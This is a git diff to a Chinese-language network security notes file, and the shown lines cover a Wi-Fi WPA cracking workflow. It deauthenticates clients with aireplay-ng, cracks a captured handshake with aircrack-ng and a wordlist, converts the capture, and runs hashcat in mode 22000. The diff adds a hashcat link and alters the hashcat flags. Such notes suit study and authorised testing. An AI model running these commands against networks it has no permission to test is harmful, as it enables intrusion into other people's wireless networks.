--- a/网络安全.md
+++ b/网络安全.md
@@ -112,12 +112,12 @@ aireplay-ng -a *:*:*:*:*:* -c *:* -0 90 wlan0mon
 # 破解密码
 aircrack-ng -b *:*:*:*:*:* -w password.txt *.cap
    # aircracky参数: -b “bssid地址” -w “密码字典文件”  “抓包成功的cap文件”
-# 把cap转成hashcat文件
+# 把cap转成hashcat文件 https://hashcat.net/cap2hashcat
 # aircrack-ng handshake-01.cap -j handshake-01
 hcxpcapngtool handshake-01.cap -o handshake-01.hc22000
 # 用hashcat破解密码  参数: -m 22000 模式 = WPA-PBKDF2-PMKID+EAPOL
 # hashcat -m 2500 handshake-01.hccapx password.txt
-hashcat -m 22000 handshake-01.hc22000 password.txt
+hashcat --show --status -a 3 -m 22000 handshake-01.hc22000 password.txt
 
 # 停止无线网卡监听模式
 airmon-ng stop wlan0mon
